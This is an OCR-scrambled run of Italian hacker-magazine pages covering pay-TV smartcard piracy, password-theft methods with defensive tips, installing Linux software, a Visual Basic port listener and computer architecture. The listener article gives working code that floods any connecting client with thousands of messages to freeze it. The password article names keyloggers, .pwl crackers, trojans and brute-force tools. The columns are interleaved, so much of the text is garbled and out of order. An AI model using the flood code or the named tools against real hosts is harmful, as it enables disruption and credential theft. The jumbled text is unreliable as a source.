? CAM (Conditional Access Modu-
le): I circuiti che si occupano di de-
codificare il segnale cifrato.

Contemporaneamente, da qualche al-


tra parte in Italia –e crediamo anche
>> Che cos’è la D2? Degna di nota è la situazione degli ab-
all’estero– c’è qualcuno che non dor- bonati a Telepiù. Secondo fonti ufficiose,
me per cercare di carpire i segreti di La D2 è la nuova carta “taroccata”, in- gli aumenti sono stati poco rilevanti e
questa nuova codifica. ventata si pensa dagli spagnoli, per la dopo anni di sonno indisturbato, qual-
Attenzione: distinguiamo Hackers da visione dei programmi codificati in Se- che dirigente milanese ha detto: “ma
Commercianti disonesti. I primi sono ca 2. La notizia non è stata conferma- forse la nostra PayTv è troppo cara?”
legati al “Sat” da una passione mania- ta però questa volta contemporanea- Non tocca certo a me darvi una rispo-

18| www.hackerjournal.it
>>

quel che luccica?


questo; tutti i forum e le chat sono affollate di persone “bisognose di
sapere”. Ma in definitiva, che cosa è cambiato realmente?

sta in merito, comunque in questa era zando un ricevitore common interface. quindi PPV e Televisione Interattiva (ITV),
del III millennio in cui i cellulari, com- Mentre prima il comando del rispondi- e purtroppo nessun aggiornamento
puter, videocamere digitali ed ogni tore, di fatto, attivava la visione, ades- della CAM potrà colmare questa gran-
strumento all’avanguardia sono ormai so abilita la carta ad aprire la visione de lacuna sopra espo-
accessibili a tutti o quasi, la televisione solo su richiesta del cliente. Tale ri- sta. Tutto questo per-
(Mass-Media più evoluto e potente in chiesta avviene pre- ché secondo Telepiù
assoluto poiché in grado di raggiunge- mendo il tasto OK Digitale veniva me-
re la più grossa fetta di utenza) deve ed una volta che appare no il concetto di PPV,
in futuro dovrà essere presente nelle il banner di acqui- visto che non erano
sto”. Benché dispon- loro a decidere
>> Ma perche non vedo la gano del tasto OK, i quando vedere l’e-
Common Interface non vento e poi perché
PPV Palco? possiedono il sistema l’ordine doveva es-
interattivo Media High- sere fatto poco prima della visione.
molteplici forme in tutte le case degli way e di conseguenza Mossa azzeccata? Indubbiamente ades-
italiani. purtroppo non sono in grado di inter- so la PayTv milanese ha un maggiore
Crediamo che chi veramente sia dispo- pretare in modo corretto il comando di controllo degli apparecchi collegati al
sto a spendere anche 500 Euro da un Seca2 e questo porterà sicuramente dei
commerciante disonesto per comprarsi
una carta “taroccata”, possa sottoscri-
vere un abbonamento di circa 40 Euro
al mese. Questo abbonamento tuttavia
non permette di vedere nemmeno il
? DVB (Digital Video Broadcasting):
Lo standard per le trasmissioni di-
gitali. Non utilizzato negli USA.
vantaggi alla stabilità della rete. Forse
però gli abbonati che disponevano del
decoder Common Interface si sono sen-
titi traditi da questa drastica scelta e non
se la sentono di acquistare un nuovo de-
50% dei programmi offerti la Telepiù inizio visione. Tali decoder, che non coder firmato “Gold Box”.K
Digitale, se si escludono gli spettacoli hanno mai permesso la visione di Pri-
Pay Per View. Forse, quindi, il fuoco mafila Stream, potranno funzionare so- Francesco Musella
lamente per i canali in pay tv, esclusa www.mondosat.net

? C I (Common Interface): Collega-


mento per l'aggiunta di espansio-
ni a un ricevitore sat (per sempio,
un CAM).
...E CI SONO IN GIRO PURE I “ TAROCCHI TAROCCATI”
li utilizzatori pirata rimasti oscu- ne delle schede rosse è la seguente:
della incontenibile pirateria italiana è
alimentato fortemente dagli elevati
G rati dal passaggio a Seca 2 sono
disposti a pagare cifre molto elevate
per poter mantenere il contratto da
rivenditore autorizzato Telepiù, i ne-
prezzi della PayTv. per avere una card taroccata per il gozianti devono sottoscrivere un cer-
nuovo sistema. Per questo pare che to numero di abbonamenti al mese.
Successivamente all’introduzione della qualcuno abbia avuto un'idea genia- Per non vedersi negare l'autorizza-
nuova smart card con la tecnologia Se- le: vendere card originali spaccian- zione, sarebbero in molti quelli che
ca 2, i ricevitori non marcati “Gold dole per "tarocche". Pare che siano alla fine del mese iscrivono persone
Box” dotati di CAM Me- infatti in circolazione delle schede inesistenti, o prese a caso dalla gui-
diaguard o Astoncrypt Seca 2 originali (le cosiddette "bian- da telefonica. Ovviamente questi ab-
non possono più accedere chine"), alle quali però è stato cancel- bonamenti sono destinati a scadere,
a Palco attraverso il con- lato, sostituito il logo Telepiù e colo- perché nessuno effettuerà mai i pa-
sueto servizio telefonico rate di rosso. Vendute a cifre anche gamenti. Se prima della scadenza il
IVR. Ecco cosa dice Telepiù superiori ai 300 euro, queste schede negoziante riesce a "piazzare" la
in proposito: “non è più pos- sono sì in grado di funzionare, ma scheda spacciandola come card pira-
sibile acquistare gli eventi Pay solo per alcuni mesi, dopodiché sa- ta, ovviamente attraverso un inter-
Per View (PPV) tramite il ri- ranno disattivate. Per ora l'ipotesi mediario non rintracciabile, ci po-
sponditore automatico, utiliz- più accreditata sulla misteriosa origi- trebbe anche guadagnare un bel po'.

www.hackerjournal.it |19
sicurezza

COME DIFENDERSI DAI LADRI DI PASSWORD

Apriti Sesamo!
“Io per comodità utilizzo la
stessa password per tutti i
sistemi che ne chiedono una”
“Anche io - Uso la tua”

I n passato, quando le uniche co-


se di valore erano costituite da
beni materiali, l’intero sistema
di sicurezza si basava su chiavi,
serrature, forzieri e casseforti. Oggi accade
molto frequentemente che i dati e le infor-
mazioni abbiano un valore molto più
grande di quello dei beni materiali, e il
ruolo svolto un tempo dalle chiavi viene af-
fidato alle password. Le “parole d’ordine”
addirittura possono anche certificare la no-
stra identità: chi si appropria delle nostre
password di accesso può quindi rubarci
dati preziosi e anche il nostro nome. In
questo articolo analizzeremo le moda- l’autenticazione è costituita dall’accoppiate le password …) e lo salva in un file. In que-
lità di attacco usate per trovare le nome utente più password, che devono ov- sta maniera, leggendo questo file riusci-
password, in modo da poter prendere viamente combaciare. Il caso della posta rebbe molto facilmente a leggere la nostra
delle adeguate precauzioni, e tutelare la elettronica è particolare, perché nel password.
propria riservatezza. 99,999… % dei casi, il nome utente è Solitamente, nelle finestre all’interno dei
uguale alla prima parte della nostra e- programmi, le password vengono nasco-
>> Computer al sicuro! mail, quella prima della @. Ad esempio se ste sotto a pallini o asterischi (****), ma esi-
la nostra e-mail è pecorella@ovile.com, il stono programmi come Showpassword
nostro username sarà pecorella. Il malin- (http://ph14.virtualave.net/ show-
Supponiamo che un malintenzionato vo- tenzionato si trova quindi a metà pass.zip) che svelano le password
glia scovare la nostra password di posta strada per trovare l’accoppiata di nascoste nelle finestre di dialogo. En-
elettronica. Perché dovrebbe farlo direte chiavi che gli fornirà l’accesso. trando nel nostro programma di posta
voi? Il motivo è molto semplice: esso po- La password è ovviamente più difficile da elettronica e leggendo le impostazioni del-
trebbe volere accedere a internet senza scoprire, ma forse non così difficile come si l’account, lui può leggere il nostro userna-
crearsi un account con i suoi dati. Per fare potrebbe pensare. Se il “malintenzionato” me e la nostra password (se abbiamo scel-
ciò utilizzerà un account già esistente (il no- avesse libero accesso al nostro Pc (nel sen- to di registrare la password).
stro); così durante la connessione so che può metterci fisicamente le mani so- Se ancora non è contento, potrebbe pre-
sembrerà che siamo stati noi a con- pra), ha svariati metodi a disposizione per levare tutti i file con estensione *.pwl
netterci, quando invece è stato lui! rubarci le password. che si trovano nella cartella C:/Win-
Oppure potrebbe voler leggere tutte le no- Innanzi tutto, potrebbe installare a nostra dows. Questi file contengono svariate
stre e-mail per carpire informazioni impor- insaputa Key Interceptor, o un altro password del computer in formato cifrato,
tanti, magari da utilizzare a nostro danno programma simile, che registra tutto ma si possono facilmente decifrare usando
in un secondo momento. Solitamente, ciò che si digita con la tastiera (anche uno dei tanti programmi che ci sono sulla

20 | www.hackerjournal.it
>>
Dieci regole per stare
rete, come per esempio Win Pass, che lo fa screen saver, o quella di un file di Word),
automaticamente. Ricordo che tutti i pro- il malintenzionato di turno potreb- tranquilli
grammi che sto citando sono facilmente be avere accesso a tutti quanti i ser-
reperibili in rete facendo una semplice ri- vizi utilizzati. Se tutti questi attacchi fal-
cerca ad esempio su Google, e quindi so-
no alla portata di tutti! Qualunque malin-
tenzionato sarebbe capace di trovarli per
lissero, al malintenzionato non resta che
provare un attacco brute force (forza bru-
ta). Usando un programma come Brutus,
1 Non utilizzate mai il vostro nome, quello del
cane o del gatto, quello dei propri gruppi o
cantanti preferiti o quello della vostra ragazza
danneggiarci. potrebbe effettuare migliaia e migliaia di (o del ragazzo).
Se invece il malintenzionato non avesse tentativi fino a trovare la password giusta.

>> Niente ingenuità


I programmi migliori per attacchi a forza
bruta (o i peggiori, a seconda del punto di
vista), utilizzano liste di parole che più
2 Utilizzate sequenze casuali di lettere e nu-
meri. Se il sistema o il servizio è in grado
di distinguerle, mischiate lettere maiuscole e
solitamente vengono usate come minuscole.
libero accesso al nostro computer, ha an- password, le famose wordlist. Scar-
cora un bel po’ di cartucce da sparare. In
questo caso, il bersaglio non è tanto il
computer, quanto la nostra ingenui-
tate queste parole, i programmi comince-
ranno a tentare combinazioni casuali di
lettere e numeri, che però sono decisa-
3 Il server del merchant invia il numero di
carta di credito e l'importo al computer
dell'istituto di credito per una verifica.
tà. mente più difficili da azzeccare. Alla lun-
Il malintenzionato potrebbe iscriversi al
nostro stesso provider e farsi un e-mail ti-
po amministratore@provider.it, staff–tec-
ga, un attacco a forza bruta è sempre vin-
cente, se non viene individuato e fermato
in tempo utile (magari da parte del provi-
4 Se per sicurezza volete trascriverei la
password su un foglietto, custoditelo in
un posto sicuro e chiuso a chiave. Non tenete
nico@provider.it o ancora staff@provi- der). L’unico modo per ritardare il più mai il foglio con le password accanto al com-
der.it, e mandarci una mail in cui dice possibile l’individuazione della password puter.
che per il riordino degli archivi bisogna da parte di un programma a forza bruta,
mandare il proprio username e la pas-
sword. Direte voi ma chi ci casca? Invece,
anche se è ovvio che il nostro provider
è quindi di usare una combinazione ca-
suale di numeri e lettere maiuscole e mi-
nuscole; la maggior parte dei sistemi in-
5 Non utilizzate mai lo stesso criterio per
stabilire la password di svariati servizi
(qualcuno per esempio usa parole composte
non ha alcun bisogno di ottenere da noi i fatti considera password come “Pippo”, come “servizio1pw”, “servizio2pw” e così
codici di accesso, sono molti quelli al- “pippo” e “pIpPo” differenti tra loro. K via).
le prime armi che ci cascano. Quindi
fate attenzione e non rispondete mai a
email che vi chiedono di comunicare la
vostra password.
SN4KE
6 Non conservate le password in un file di
testo che non sia cifrato con un sistema
robusto (per esempio con Pgp/Gpg).
Per decifrare i file .pwl, come descritto nel
paragrafo precedente, non è necessario
avere accesso fisico al computer. Il ladro
di password potrebbe infatti farlo a di-
7 Non rispondete mai a messaggi o telefo-
nate che richiedono di comunicare la pas-
sword, anche se sembrano arrivare dal pro-
stanza usando un programma come prio provider.
Netbus o altri trojan, che permetto-
no di scaricare i file .*pwl per poter-
ci lavorare con calma. Di tutti questi
metodi inoltre, se il malintenzionato co-
8 Utilizzate un programma che blocchi l’ac-
cesso al proprio computer quando ci si al-
lontana (il modo più elementare è quello di im-
nosce la vittima, può tentare di fare una postare una password per il salvaschermo).
lista di password possibili, provando con
il suo nome, quello della sua ragazza, la
sua squadra del cuore, il suo cantante
preferito, la sua data di nascita eccetera.
9 Nel caso di password abbinate a schede
magnetiche (come quella del bancomat),
non custodite mai scheda e codice nello stes-
so posto.
>> La forza bruta

Ad aggravare le cose, c’è il fatto che alcu-


10 Prendete tutte le precauzioni per evitare
di installare dei Trojan: non aprite file
eseguibili sospetti, non lasciate il vostro com-
ne persone utilizzano la stessa password puter incustodito, usate un firewall personale
per tutto. In questo caso, individuata una Una volta installato, Ghost Keykogger (www.keylogger.net) e un buon antivirus.
può essere eseguito all’insaputa dell’utente, ed è in grado di
password qualunque (come quella dello registrare in un file di testo tutti i tasti premuti, e di spedire
questo file via email a intervalli predefiniti.

www.hackerjournal.it |21
LINUX

COMPILARE UN SORGENTE, INSTALLARE UN PACCHETO O AGGIORNARE LE LIBRERIE

Installare programmi in linux


Con Linux installare un programma richiede una procedura un po’ più compicata del
semplice doppio clic di un installer per Windows o Mac. Ecco tutto quello che dovete
sapere per regalare nuovi programmi al pinguino che vive nel vostro computer.

I I programmi per Linux (e


per Unix in generale) ven-
gono solitamente distribui-
ti in due diversi formati:
come “sorgenti” e come
file binari. I sorgenti sono formati
dal listato vero e proprio del pro-
vuole un comando un pò più
complesso:

# cd ~/tmp
# cat pacchetto.tar.bz2
bunzip | tar xvf -
|

gramma, ed è quindi possibile Il risultato di solito è:


aprirli con un editor di testo, leg-
gerli e modificarli (il bello del soft- * uno o più file di documen-
ware libero è proprio questo). Per tazione;
poter funzionare però, il program- * uno o più script per faci-
ma deve essere “compilato”, cioè litare l’operazione;
tradotto in istruzioni comprensibili * il makefile
per il computer. Questa “traduzio-
ne” però varia a seconda del siste- Adesso dovrebbe essersi crea-
ma operativo e del processore su ta la dir “pacch/” entriamoci:
cui il programma deve funzionare.
Per questo, mentre un sorgente # cd pacch
può essere scaricato e compilato su # ls
qualsiasi combinazione OS/CPU,
un file binario può essere installa- I file di documentazione servono
to solo sul computer per il quale è per riassumere le istruzioni di
stato compilato. compilazione ed è bene leggerli,
In questo articolo vedremo come con questi comandi:
installare i programmi distribuiti mente dallo script “./configure”;
nei due diversi modi, come instal- # less README se questo fiile non fosse presente,
lare le librerie necessarie al loro # less INSTALL deve essere controllato o modifi-
funzionamento e come tenere cato manualmente prima della
aggiornati i propri programmi. Se i nomi dei file sono diversi da compilazione. I pacchetti sorgenti
quelli elencati, ovviamente biso- di solito si compilano con tre sem-
>> Compilare i sorgenti gnerà usare il nome corretto. plici operazioni:
La composizione di un pacchetto
sorgente comprende uno script # ./configure
Un programma sotto forma di sor- che costruisce un makefile adatto ;genera il makefile
gente viene di solito distribuito all’ambiente in cui si vuole compi- # make
compresso, e ha estensione .tar.gz, lare il programma. Questo perchè ;esegue la compilazione
.tgz oppure ancora .tar.bz2. Prima- i sistemi UNIX sono spesso e creando i file eseguibili
di procedere alla compilazione, volentieri diversi tra loro. # make install
questi faile vanno scompattati in Il makefile è quello che viene letto
questo modo: dal comando “make”, con lo ;installa gli eseguibili e gli altri file
scopo di coordinare le fasi di com- del programma (è necessario
# cd ~/tmp pilazione o di installazione di un avere accesso come root).
# tar xzvf pacchetto.tar.gz programma già compilato. I problemi maggiori si verificano
Se è un archivio .tar.bz2, ci Questo file viene generato solita- quando non è stato configurato lo

www.hackerjournal.it |22
>>
script “./configure”, per cui si è dalle directory predisposte per
Come aggiornare un
costretti a modificare a mano il contenerle. per renderle disponi- programma
makefile, oppure quando il make- bili ci sono 2 modi:
file non prevede il comando Molto spesso, invece di installare
“make install”, e bisogna quindi * modificare la configurazio- completamente la nuova versione
installare il programma mettendo ne di “/etc/ld.so.cache”; di un programma, è possibile
a mano i file giusti al posto giusto. * utilizzare la variabile di aggiornare la vecchia versione con
ambiente “LD_LIBRARY_PATH” una patch. Se la versione da
aggiornare si trova nella cartella
>> Installare Pacchetti Per agire secondo la prima possi- “~/tmp” dobbiamo posizionarci in
gia compilati bilità bisogna comprendere come quella stessa cartella e fare:
funziona questo sistema. Il file
“/etc/ld.so.cache” viene creato a # patch < file_da_aggiornare
Adesso passiamo all’installazione partire da “/etc/ld.so.conf”, che
di programmi già compilati. contiene directory destinate a con- L’aggiornamento potrebbe fallire.
Innanzitutto dobbiamo prendere tenere delle librerie. Il program- Se vogliamo vedere gli errori com-
del software adatto per la nostra ma “ldconfig” serve a ricreare messi basta digitare:
piattaforma. Il sorgente di uno “/etc/ld.so.cache” in modo da
stesso programma può infatti mantenerlo aggiornato. # patch < file_da_aggiornare
dare origine a differenti pacchetti Occorre quindi aggiungere le 2> file_degli_errori
compilati a seconda del sistema directory che ci servono al file
operativo utilizzato e della piatta- “/etc/ld.so.conf” e poi riavviare Se gli aggiornamenti sono più di
forma hardware (normalmente “ldconfig” uno dobbiamo applicarli in
per i Personal Computer si usa la sequenza.
dicitura i386). Un programma in Per usare invece la variabile di
formato binario deve essere sistema “LD_LIBRARY_PATH” pos-
estratto dall’archivio che lo contie- siamo intervenire attraverso sem- LD_LIBRARY_PATH=”/opt/mio_pro
ne; fortunatamente, a volte c’è plici script, con ciò possiamo fare gramma/lib:$LD_LIBRARY_PATH”
uno script che ha proprio questa un modo che un solo programma export LD_LIBRARY_PATH
funzione. Altre volte invece biso- veda certe librerie.
gna farlo manualmente. Se vogliamo usare questa variabi- Avvia il programma:
Quando si può scegliere la desti- le ricordiamoci di includere anche # mio_programma
nazione è bene mettere tutto in i percorsi standard: Avviando lo script viene modifica-
una cartella, preferibilmente ta la variabile
discendente da “/opt/” e in certi “/lib/”, “/usr/lib/”, “LD_LIBRARY_PATH” per quel pro-
casi bisogna definire alcune “/usr/local/lib”. Ecco un esem- cesso e quindi alla fine del proces-
variabili d’ambiente affinché il pio dell’aggiunta di questa so termina lo script e tutte le sue
programma possa funzionare. variabile a “/etc/profile”: modifiche.
Uno dei casi più comuni è la PATH
che dovrebbe contenere il percor- LD_LIBRARY_PATH=/lib:/usr/li
so necessario ad avviare il pro- b:/usr/local/lib:/opt/mio_pr Vediamo ora la sintassi del
gramma. Quasi sempre i file di og/lib:/opt/altr comando “ldd”.
documentazione che accompa- o_prog/lib
gnano i programmi elencano tutte export LD_LIBRARY_PATH # ldd /bin/bash
le variabili necessarie al funzio- ; risultato: lbncurses.so.4
namento. Se un programma richiede libre- => /usr/lib/nbcurses.so.4
Queste variabili possono essere rie che possono entrare in conflit- (0x40000000)
collocate in alcuni file di configu- to con altri programmi è bene ; e di seguito le altre
razione della shell utilizzata configurare questa variabile solo librerie richieste.
(come /etc/profile/ oppure per un certo programma, vediamo
~/.bash_profile), e variano a come fare: Il risultato in pratica mostra le
seconda di come è configurato il dipendenze dalle librerie di
sistema. # /bin/sh “/bin/bash”, indica il nome delle
Alcuni programmi usano librerie librerie e il loro posto nel sistema,
non standard, dette dinamiche, Modifica il percorso di ricerca risolvendo anche collegamenti
che spesso vengono collocate fuori delle librerie: inutili. K

www.hackerjournal.it |23
Sicurezza

QUALCUNO BUSSA ALLA VOSTRA PORTA? SBATTETEGLIELA IN FACCIA!

La miglior difesa è l’attacco


Un piccolo programma in Visual Basic che logga i tentativi di accesso a varie porte e
invia una “salva di avvertimento” a chi cerca di connettersi.

N
Basta aprire un firewall per 2 CommandButton e il winsock. Per ren- cale la porta che viene scritta nella txtport
notare che un qualsiasi PC dere il tutto meno complicato e quindi “txtport.txt <— testo della txtport”, gli or-
collegato a Internet riceve de- l’algoritmo più comprensibile, eviteremo diniamo di mettersi in ascolto su quella
cine di tentativi di connessione di inserire istruzioni di debugging come porta e infine di visualizzare una finestra
e ispezioni che mirano a indi- GestError e moduli di gestione di control- msgbox “messaggio” con scritto:
viduare una porta aperta. li grafici (Enabled e compagnia). “Servizio in ascolto sulla porta: “ &
Questo articolo illustrerà come realizzare I componenti del programma sono:
e applicare un servizio che, messo in txtport.Text,”
ascolto, potrà darvi la possibilità di OGGETTO NOME
loggare di chi cerca di connettersi - Textbox txtport dove appunto
alla vostra macchina, avendo in ol- - Command1 cmdascolta
tre la possibilità di bloccare il client - Command2 cmddisconnetti “& txtport.Text”
che l’amico fritz sta utilizzando, ma solo - List1 lstlog
nel caso in cui avvenga una richiesta di - Winsock ws indica l’immissione nel messaggio del nu-
connessione con invio di flag TCP “SYN”. mero digitatao nella txtport.
Nella pratica, qualora rilevasse una richie- Potete vedere l’intero codice del program- “Vbinformation” indica il tipo di msgbox,
sta di connessione su una deterimanta ma nel riquadro in questa pagina. Passia- nel nostro caso informazione\notifica
porta selezionata da noi, il servizio invierà mo quindi ad analizzare quello che abbia-
un flood testuale paralizzando momenta- mo codato, analizzando uno per uno i 2) ws_ConnectionRequest
neamente il client, che si troverà a riceve- suoi tre eventi: cmdascolta_Click (ciò che
re una grande mole di dati. Private Sub ws_ConnectionRe-
quest(ByVal requestID As Long)
>> Il programma
Questo può essere molto utile per scorag-
? Flood: una grande mole di dati
inviata a ripetizione verso un
computer o un programma,
con l’intento di paralizzarne la
If ws.State <> sckClosed Then
ws.Close
ws.Accept requestID
lstlog.AddItem “Connessione di
giare eventuali lameroni che decidessero connessione. :” & ws.RemoteHostIP & “ sulla
di tentare connessioni a porte particolar- porta :” & txtport.Text
mente senisbili e che non corrispondono a succede quando facciamo clic sul pulsan- For i = 1 To 10000
servizi effettivamente attivi. Per esempio, te cmdascolta), ws_ConnectionRequest ws.SendData “Togliti dai piedi
chi installa un Web server locale, non ha (ciò che succede quando riceviamo una ri- lamerone, sei stato loggato —-
alcun bisogno dei servizi ftp (porta 21) o chiesta di connessione dall’esterno) e > “ & ws.RemoteHostIP & vbCrLf
telnet (porta 23), e può quindi “protegger- cmddisconnetti_Click (ciò che succede Next i
li” con questo programmino. quando facciamo clic sul pulsante cmddi- End Sub
Per realizzare questo programma serve sconnetti).
l’ambiente di sviluppo Visual Basic, in Ora analizziamo invece quanto avviene
versione 5 o 6. Create un nuovo pro- 1) cmdascolta_Click nel caso in cui il nostro servizio riceva
gramma exe standard con un form nel una richiesta di connessione “ricezione
quale inserirete una TextBox, una ListBox, Private Sub cmdascolta_Click() flag TCP SYN”. Come prima cosa accetta
ws.LocalPort = txtport.Text la connessione, in seguito aggiunge una
ws.Listen riga al log “lstlog” inserendo un messag-
MsgBox “Servizio in ascolto gio del tipo
sulla porta: “ & txtport.Text,
vbInformation “Connessione di : *ip del la-
End Sub mah”
sulla porta : *scritta nella
Come dicevamo, questo è quanto accade txtport*”
La finestra del programma Listening,
quando si fa clic sul CommandButton
posto in ascolto sulla porta 23. I due
“cmdascolta”. Come prima cosa istruiamo Dato che ws.remoteHostIp indica l’ip dell’-
pulsanti attivano e disattivano il servizio. il nostro ws per impostare come porta lo- host remoto che cerca di connettersi, una

24| www.hackerjournal.it
>>
lasciando quindi solo la stringa da inviare.
Se invece non desideriamo far visualizzare
a chi si connette alcun messaggio, optan-
do quindi solo di loggare il suo IP, dobbia-
mo eliminare anche

ws.SendData “Togliti dai piedi


lamerone, sei stato loggato —-
> “ & ws.RemoteHostIP & vbCrLf

facendo inmodo che il socket ws non invii


nulla.

3) cmddisconnetti_Click

Private Sub
cmddisconnetti_Click()
ws.Close
MsgBox “Sessione terminata”,
vbInformation
End Sub

Questo invece è quanto accade cliccando


sul CommandButton “cmddisconnetti”.
Come prima cosa verrà chiuso il socket, e
quindi il programma nonsarà più in ascol-
to. In seguito verrà visualizzata una
msgbox “messaggio” con scritto “sessione
Il Flood di dati che investe il malcapitato che ha osato tentare una connessione
non autorizzata al nostro computer.
terminata”, di tipo vbinformationì “infor-
mazione/notifica”. Il programma si con-
clude qui. Se desiderate avere il program-
il FuckMsg (messaggio di fanculo) con ac- ma in ascolto su più porte diverse, basterà
Loggare: tenere traccia di un

? evento in un registro (il log), soli-


tamente costituito da un file di te-
sto. In un tipico log di connessio-
ni Internet, vengono segnati co-
canto il suo ip. Il vbCrLf alla fine della
stringa la manda a capo, facendo in mo-
do che non si sovrappongano una sull’al-
tra, ma vengano visualizzate belle leggibi-
li in colonna, sul client telnet di chi cerca di
impiantare tanti sock quante sono le porte
da tenere in ascolto...

endsub
me minimo l’indirizzo IP da cui
proviene la chiamata, la data e connettersi. Il numero di ripetizioni può IL CODICE DEL PROGRAMMA
l’ora della connessione. essere modificato a piacimento. Impo- LISTENING
stando un numero molto altro di ri-
volta accettata la connessione e loggato petizioni (come 500000...) si potrà ws.LocalPort = txtport.Text
l’indirizzo del lamer si attiva il cliclo di for impallare il client che “l’utente” sta ws.Listen
“impostabile”, ossia: usando per connettersi, costringendo- MsgBox “Servizio in ascolto sulla porta: “ &
lo quindi a killare il processo. txtport.Text, vbInformation
For i = 1 To 10000 Ciò funge anche con client che non visua- End Sub
Private Sub cmddisconnetti_Click()
ws.SendData “ Togliti dai pie- lizzano i dati ricevuti, come per esempio ws.Close
di lamerone, sei stato loggato alcuni portscanner, client ftp.. o perchè no MsgBox “Sessione terminata”,
—-> “ & ws.RemoteHostIP & WebCracker e company, i quali andranno vbInformation
vbCrLf solo in overflow bloccandosi a causa del- End Sub
Next i l’eccessivo flusso ricevuto dal server (il no- Private Sub ws_ConnectionRequest(ByVal
stro computer). Se invece non desideria- requestID As Long)
che indica un’invio di diecimila stringhe, mo esegguire l’attacco, ma solo far visua- If ws.State <> sckClosed Then ws.Close
con il comando lizzare a chi si connette il “messaggio di ws.Accept requestID
benvenuto” e loggarlo, ci basterà elimina- lstlog.AddItem “Connessione di :” &
ws.SendData “ Togliti dai pie- re ws.RemoteHostIP & “ sulla porta :” &
txtport.Text
di lamerone, sei stato loggato il clico di for nel quale è inserita la stringa For i = 1 To 10000
—-> “ & ws.RemoteHostIP & da sendare, ossia eliminare ws.SendData “Togliti dai piedi lamerone, sei
vbCrLf stato loggato —-> “ & ws.RemoteHostIP &
For i = 1 to 10000 vbCrLf
Questa stringa verà visualizzata dal la- Next i
mer che cerca di connettersi, che leggerà e anche Next i End Sub

www.hackerjournal.it |25
Programmare

LE COMPONENTI E L’ARCHITETTURA DELLA “MACCHINA C”

Ma cosa c’è dentro


un computer?
Per tanti il computer è solo una scatola magica in grado di fare
determinate cose, ma chi vuole sfruttarne al meglio ogni funzione, deve
cominciare a conoscere meglio il suo funzionamento.

N ello scorso numero abbiamo


cominciato a parlare del lin-
guaggio C, e della program-
mazione in generale. Il fun-
zionamento del C e di tutti i
linguaggi a lui simili (C++, ASP,PHP...)
può, talvolta, essere di difficile compren-
e il mondo esterno. Ad esempio, una pe-
riferica di input è la tastiera, una di output
la stampante.
-BUS; è un insieme di linee che mettono
in comunicazione tutti i componenti della
macchina.
(ecco perché si perdono i dati di ore e
ore di lavoro quando spesso si impalla
la mostruosa creature di Mr Gates...), è
di accesso molto più veloce, ed è un
passaggio obbligato nell’esecuzione dei
programmi.
Dal punto di vista fisico è un dispositivo
sione per chi si avvicina alla programma- Queste componenti CPU, memoria RAM a semiconduttori, con uno schema simi-
zione per la prima volta. Per gestire bene e periferiche dialogano tra loro attraverso le a quello di Figura 2.
i linguaggi derivati dal C, è necessario co- il BUS, seconodo lo schema mostrato in La memoria è strutturata come una se-
noscere la “macchina”, il suo funziona- Figura 1. quenza di celle di memoria, in cui ogni
mento a livello fisico e astratto, oltre che cella contiene una WORD (parola)...di-
le sue componenti. ciamo semplicemente un “dato”. Ogni
Questo articolo si propone l’intento di incrocio tra righe e colonne (sarebbero i
spiegare (anche se in maniera poco ap- BUS cerchietti della figura) assume un valore
profondita) l’architettura della maggior di tensione, se esso è alto equivalerà al
parte degli elaboratori attuali, general- valore “1”, se basso rappresenterà lo
mente basati secondo il modello della “0”...per questo motivo si dice che il
macchina di Von Neumann (ricercatore computer ragiona in modo binario ed è
americano di metà ‘900 che si dedico’ al- per questo che nella scena finale del
la realizzazione dei primi calcolatori), e di Periferica Periferica film “Matrix” quando “il messia” rag-
CPU RAM
chiarire cosa accade quando si esegue un I/o I/o giunge la completa forma riesce a per-
programma sul nostro PC. cepire il mondo come è realmente fat-
Figura 1
to...ovvero come lo vede la macchi-
L’architettura di un elaboratore
>> Architettura di un na...in binario!
elaboratore
>> La memoria centrale 1a WORD

Le principali componenti della macchina


di Von Neumann sono: Su questo argomento ci dilungheremo
-CPU; Central Processing Unit; rappre- un po’, perché è di fondamentale im-
senta la parte centrale del pc, il cervello portanza per la comprensione di tutti gli
che estrae ed elabora le informazioni. altri. La RAM (o memoria centrale), è un
Viene chiamato anche processore; particolare tipo di memoria che contie- 2a WORD

-RAM; Random Access Memory; rappre- ne le informazioni e i dati necessari per bit
senta la memoria centrale, ovvero la par- l’esecuzione dei programmi. È da di-
te di memoria temporanea che la CPU stinguere dalle memorie di massa (co- 1 2 3 4 5 6 7 8
utilizza come appoggio per eseguire le me l’HD, floppy, cd...) per via delle sue
operazioni. principali caratteristiche: essa è fonda-
1 byte = 8 bit
-Periferiche I/O; Sono le periferiche di mentalmente di dimensioni molto ri-
Input e/o di Output; Esse permettono lo dotte, è di tipo “volatile” (si perde il Figura 2
scambio di informazioni tra l’elaboratore suo contenuto quando si spegne il PC Il funzionamento della RAM

26 | www.hackerjournal.it
>>

?
L e t t ura

zione tutte le componenti della macchina, Algoritmo: racchiude una serie


0101010 trasferendo informazioni tra CPU, Memo- di istruzioni precise e dettagliate
Registr
o indir
izzi
1 ria ed interfaccie I/O. Il tutto avviene sotto per raggiungere un determinato
la supervisione del processore che decide scopo.(Es: Versare dell’acqua in
quali connessioni attivare tra Master (la un bicchiere: prendi il bicchiere,
CPU), e SLAVE (ad esempio RAM o I/O). controlla se è pieno o vuoto; se
I Principali tipi di BUS trasferiscono diversi è pieno lo scopo è raggiunto; in
tipi di informazione a seconda della loro caso contrario prendi la bottiglia
funzione: e versa l’acqua nel bicchiere.)
Il Bus Dati, in modalità “lettura”, trasferi-
sce dati da una cella di memoria al regi-
stro dati; in modalità “scrittura” li trasferi- cessore utilizza molti registri. Oltre a quelli
01

Scrittura

sce dal registro alla cella. già mensionati( Reg.Dati e Reg. Indirizzi) è
L e t t ura

Il Bus Indirizzi trasferisce il registro indi- bene ricordare il registro istruzione corren-
01

rizzi alla memoria principale. te, il contatore programma, il registro inter-


01

C’è poi il Bus Controlli, che scambia in- ruzioni, i registri di lavoro e tra gli altri l’im-
formazioni tra Master e Slave. portantissimo Registro di Stato, che riporta
01

E’ la parte della macchina che interpreta molte informazioni fondamentali sulle ope-
ed esegue effettivamente le istruzioni (ov- razioni svolte dalla ALU. K
Registro Dati
vero gli algoritmi tradotti in linguaggio
Figura 3 macchina) del programma dopo aver By Biulo
Trasferimento dei dati tra estratto e decodificato le informazioni (che arkanet@hotmail.com
memoria e altri componenti son tutte trasmesse in linguaggio binario).
MEMORIA RAM E ROM
Ritornando al nostro argomento principale >> La CPU
(la memoria centrale), spieghiamo ora co- I tipi di memoria centrale non si limitano al-
me la macchina esegue le operazioni di let- la RAM, esiste infatti un altro importante ti-
